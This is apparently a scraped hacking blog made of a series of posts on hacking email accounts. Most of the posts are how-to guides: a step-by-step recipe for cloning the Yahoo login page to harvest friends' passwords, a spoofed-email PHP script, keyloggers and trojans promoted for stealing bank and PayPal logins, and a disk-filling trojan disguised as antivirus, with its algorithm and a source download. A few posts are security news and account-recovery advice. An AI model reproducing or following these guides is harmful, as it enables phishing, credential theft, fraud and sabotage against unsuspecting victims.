A keylogger records the every keystrokes (as said above) the victim presses and mail you the info. By installing the keylogger u can not only hack his email password u can get the list of the sites he visits and their passwords you can also hack bank and paypal accounts with this.

Keyloggers are widely available on the internet, you can google it (google search) for more info or you can just check our upcoming posts on hacking emails using keyloggers.

Soon we will upload some videos too.

Trojans
These are the hackers best friends, also called as Remote Administration Tools, you can play with the victim’s system with the help of these tools, you will have total control over his system, some of the features of these programs are as follows

- Pro – connective ( Reverse Connection)

- Run any Program in the victim’s pc.

- Run MS-Dos Command.

- Run Batch Script

- Run Vb Script

- Run Registry Entry

- Receive MSN , Steam , IExplorer, Firefox, Anti virus , Dial-Up , Crypted Passwords

- Keylogger ( Live keylogger, you can see in Live ! ) *New*

- ScreenShot + WebCam ( Live ! ) *New*

- Files Manager with PRO Options

- Search Files

- Registry

- Admin FTP

- Windows

- Application ( Max Process , Directory Of File, Memory RAM, Refresh and Kill Button )

- Online Editor *New*

- Printer

- Downloader

- Give Damage

- Clip board

- Shut Down PC

- Control Panel

- MSN Stuff ( You can add a contact , delete a contact, change his status and chat with his contacts in Live ! ) *New*

- Funny Stuff ( Hide Desktop Windows, Hide Start Button , Hide task bar, Open CD-ROM, Swap Mouse Buttons, Minimize All Windows, Start Mouse Control, Modify/Upload Wallpapers, Play Sound, Control keyboard, Lock Ctrl+Alt+Del, HTML Script) *New*

- Chat ( With Custom Skin , Nickname) *New*

- Alert Message ( Custom Error messages, Questions with answers)

and also a lot of things can be done with these trojans.

If you want to know how to hack with trojans and where to get them, just check our upcoming posts on email hacking with trojans.

Fake pages

Hacking by fake pages is the best easy and effective way its mostly used and 33% of the total passwords hacked are by using this method .

In this method we will send him a fake page of the site which we want to hack, fake page looks exactly the same like the real one the only difference is the address or url of the page , the victim thinks that fake page as original one and enters the password then we will get his password to our mail

1.HACK GMAIL

2.HACK YAHOOMAIL

3.HACK HOTMAIL

4.HACK AOL

4.SNIFFING

This method is used when the victim and you are in the same lan then we can sniff all his passwords and also record all his traffic.

For more info check our upcoming post on hacking email by sniffing.

Read More

How to get back a hacked orkut or gmail account

Now a days most of the hackers are targeting gmail accounts dude to the no of services offered by the google

if hacker change the secret question and secondary email to new ones. Once these two things are changed, you cannot get back your account through the forgot password tool.

then follow these steps

Gmail has a special page to report such incidents when someone hacks into your account.

check it here :https://services.google.com/inquiry/gmail_security1.




The Gmail Team considers numerous data points when determining original account ownership in a hijacking case. In addition to the information requested on the form, you can also include the following information to help them process your claim.
The email addresses of up to 3 Frequently Mailed Contacts
The names of up to 3 Labels
Any other Google services you used with this account and the date you started using each one
Your ip-address

You can also resubmit the form later if you find any additional information that would help them investigate. This process is said to take about 4-10 days.

Read More

BackTrack 4 Pre Release Available For Download

You may remember back in February the BETA of BackTrack 4 was released for download, the team have made many changes and have now released BackTrack 4 Pre Release.

For those that don’t know BackTrack is the top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It’s evolved from the merge of the two wide spread distributions – Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new-comers are using BackTrack as their favorite toolset all over the globe.


The new version has busted the 700mb file size though so it’d DVD or USB, it’s recommended to use a USB drive to run it or install it on your HDD as running from a CD isn’t exactly speedy.

Full details available in the PDF guide:

BackTrack 4 Guide [PDF]

You can download BackTrack 4 Pre Release ISO here:

bt4-pre-final.iso

Or read more here.

Read More

Massive Malware Outbreak Infects 30,000 Websites

This looks like a fairly complex infection mechanism combining exploiting websites, injecting JavaScript code then attempted exploitation of host machines and failing that prompting a download for some fake malware.



The way they have it all setup is pretty clever too hiding behind common technologies so their infections don’t look out of place.



An obfuscated JavaScript meant to look like Google Analytics code? That’s smart.



A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.



The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot.



The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor’s machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software.



If you imagine 30,000 websites have been installed, how much traffic do these sites have in total? And out of that how many client computers have been infected.



The numbers could be quite huge.



The rogue anti-virus seems fairly intelligently designed too with polymorphic techniques to avoid signature scanning by real AV engines.



The rogue anti-virus software uses polymorphic techniques to constantly alter its digital signature, allowing it to evade detection by the vast majority of legitimate anti-virus programs. Because it uses obfuscation, the javascript is also hard to detect by antivirus programs and impossible to spot using Google searches that scour the web for a common string or variable.



“For the common user, it’s going to be possible but difficult to determine what the code is doing or if it’s indeed malicious,” Chenette told The Register. “We can see this quickly growing.”



The infection shares many similarities with a mass website malady that’s been dubbed Gumblar. It too injects obfuscated javascript into legitimate websites in an attempt to attack visitors. So far, it’s spread to about 60,000 sites, Websense estimates.



Several differences in the way the javascript behaves, however, have led Websense researchers to believe the two attacks are unrelated. The researchers have also noticed that the code, once it’s deobfuscated, points to web addresses that are misspellings of legitimate Google Analytics domains that many sites use to track visitor statistics. The RBN, or Russian Business Network, has used similar tactics in the past, and Websense is now working to determine whether those responsible for this latest attack have ties to that criminal outfit.



Seems like it could possibly be from Russia (the RBN) and it’s not related to Gumblar, even though they have quite a few similarities.



Interesting case to watch, and make sure any sites you run are up to date, secured and not open to SQL injection!



Source: The Register

Read More

China's Mandated Site-Blocking Software is Pirated code

ccording to Solid Oak Software, the makers of CyberSitter, one of the more popular Internet-filtering programs, not only does Green Dam look similar to CyberSitter, it uses DLLs identified with CyberSitter, and even gets updates from Solid Oak's servers.



Piracy?  A Chinese company stealing intellectual property   No way !!!!!!!!!

CYBERsitter - Solid Oak Software





Green Dam - Software

Seriously, not only does the software use pirated code, a University of Michigan study shows that the software contains security vulnerabilities.



The good thing is, the software needn't be installed on PCs bought in China; the OEM merely has to provide a CD with the installable image. Additionally, the software is uninstallable, although the University of Michigan study notes that it leaves the log files behind, so even after uninstalling, historical user activity can be ascertained.



An interesting conundrum, however. Since the Green Dam program contains CyberSitter code, any OEM providing the code on or with their computers would be facilitating piracy. Of course, if they don't do so, they won't be able to sell to China. Ooof.





via

Read More

How to Send Anonymous Emails

The art of sending this kind emails is known as Email Spoofing.This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?

Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.

Anonymous Email Sender Script

 Here is a step-by-step procedure to setup your own Anonymous Email Sender Script

1. Goto X10 Hosting  and register a new account.

2. Download my Anonymous Email Sender Script (sendmail.rar).

3. Login to your FreeWebHostingArea Account and click on File Manager.

4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

6. Now type the following URL

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

Tell me whether it worked or not. Please pass your comments…

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

Read More

Gmail Hacking Tool – A New Way to Hack Gmail

A new Gmail hacking tool that is capable of automatically stealing the Gmail IDs of non-encrypted sessions and breaking into Gmail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed this Gmail hacking tool is planning to release the tool in two weeks.

When you log in to Gmail account the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually click the sign out button. When you click sign out this cookie is cleared.Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done.

According to Google this behavior was chosen because of low-bandwidth users, as SLL connections requires high bandwidth.The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for a hacker to sniff the traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. The new Gmail hacking tool is capable of doing this. Once this happens the hacker can log into the account without the need of a password. People checking their e-mail from public wireless hotspots are more likely to get hacked than the ones using secure wired networks.

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.

“If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

Read More

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.

A keylogger program is widely available on the internet.some of them are listed below

Win-Spy Monitor

Realtime Spy

SpyAgent Stealth

Spy Anywhere

For more information on keyloggers and it’s usage refer my post Hacking an email account.

Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.

Read More

How to Create a Fake Login Page

In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

Due to a large number of requests from my visitors, I have elaborated some of the steps in this post. I have made best effort to explain every point in detail.

Here is a step-by-step procedure to create a fake login page.

STEP 1.

Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)

To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.

Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.

Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.

Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”

Rename the above link into

src=”files/ma_mail_1.gif”

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.

Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.

Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP

STEP 8.

Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT  file (or any other format) in your site. Download the file to see the password inside it.

Read More

How to Make a Trojan Horse

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run.  Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan along with it’s source code HERE.

How to compile, test and remove the damage?

Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

Read More

A Closer Look at a Vulnerability in Gmail

Gmail is one of the major webmail service provider across the globe. But as we all know Gmail still carries that 4 letter word BETA. Sometimes we may wonder, why Gmail is still in the testing stage even after years of it’s emergence. Here is one small reason for that. 

Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the term Gmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.

This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phising or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combinations.

First Name        Last Name

Gmail                       Team

Google                     Team

Gmail                       Password Assistance 

From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing it’s services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.

1. Login to your Gmail account and click on Settings.

2. Select Accounts tab

3. Click on edit info

4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!

Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot

Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.

So the bottomline is, if you get any emails that appears to have come from the Gmail Team or similar, don’t trust them! Anyone can send such emails to fool you and take away your personal details. Hope that Gmail will fix this vulnerability as soon as possible to avoid any disasters.

Read More